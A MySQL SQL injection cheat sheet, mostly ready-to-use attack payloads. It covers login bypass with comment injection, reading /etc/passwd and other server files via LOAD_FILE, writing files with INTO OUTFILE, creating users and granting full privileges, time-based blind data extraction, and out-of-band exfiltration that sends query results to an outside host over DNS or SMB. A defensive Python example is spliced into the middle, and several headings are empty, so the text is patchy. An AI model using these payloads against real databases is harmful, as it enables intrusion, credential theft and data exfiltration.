MySQL SQL Injection Cheat Sheet
Initial Exploitation

Quick Detection

Blind SQL Injection (Time Based)
Line Comments
  DROP sampletable;--
  DROP sampletable;#
  Username: admin'--
  Username: admin' or '1'='1'--
  SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'
  This logs you in as the admin user, because the rest of the SQL query is ignored.

Inline Comments
  Comment out the rest of the query by not closing the comment, or use inline comments to bypass blacklists, remove spaces, obfuscate, and determine the database version.
  DROP/*comment*/sampletable
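To see the Line Comments entry from the defender's side, here is an added example (not part of the cheat sheet) that runs the admin'-- login bypass first against a string-built query and then against a parameterised one; it uses Python's sqlite3 in place of MySQL, an assumption noted in the code, since the "--" line-comment behaviour the payload relies on is the same in both.

```python
# Added example, not from the cheat sheet. sqlite3 stands in for MySQL
# (assumption); its "-- " line-comment handling matches what the entry uses.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory members table with one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 'correct horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Untrusted input is spliced into the SQL text: a closing quote plus "-- "
    # ends the string literal and comments out the whole password check.
    sql = (f"SELECT * FROM members WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders bind the values separately from the statement text; the
    # quote and comment marker are plain characters in the username, not SQL.
    sql = "SELECT * FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # The trailing space after "--" is what MySQL requires for a line comment;
    # sqlite3 accepts it as well, so the same payload exercises both.
    payload = "admin'-- "
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))    # True
    print("parameterised:", login_safe(db, payload, "wrong"))       # False
```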
If Statements
  Get a response based on an IF statement. This is one of the key points of blind SQL injection, and it is also very useful for testing simple things blindly and accurately.
  MySQL IF statement: IF(condition, true-part, false-part)
String without Quotes
  SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
  This returns 'KLM'.

Bulk Insert
  Insert file content into a table.
  SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --

Load File
  ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
  SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
  This shows the content of c:\boot.ini (the hex literal is that path written without quotes).

Command Execution
  Possible using UDFs (user defined functions).
  http://packetstormsecurity.org/libraries/lib_mysqludf_sys_0.0.3.tar.gz
Create Users
  CREATE USER username IDENTIFIED BY password; --

Drop Users
  DROP USER username; --

Make User DBA
  GRANT ALL PRIVILEGES ON *.* TO username@'%';

List Users

List Passwords

List Databases

Privileges
Getting user defined tables
  SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
  tblUsers -> table name

Getting Column Names
  SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers'
  tblUsers -> table name
  SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
  Finds the tables that have a column called 'username'.
Default Databases

Path of DB files
Time Based SQLi Exploitation
  ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
  {INJECTION} = the query you want to run. If the condition is true, the response arrives after 14 seconds; if it is false, it is delayed by one second.
Out of Band Channel
  ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))
  Makes an NBNS query / DNS resolution request to yourhost.com.
  ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')
  Writes data to your shared folder/file.
  {INJECTION} = the query you want to run.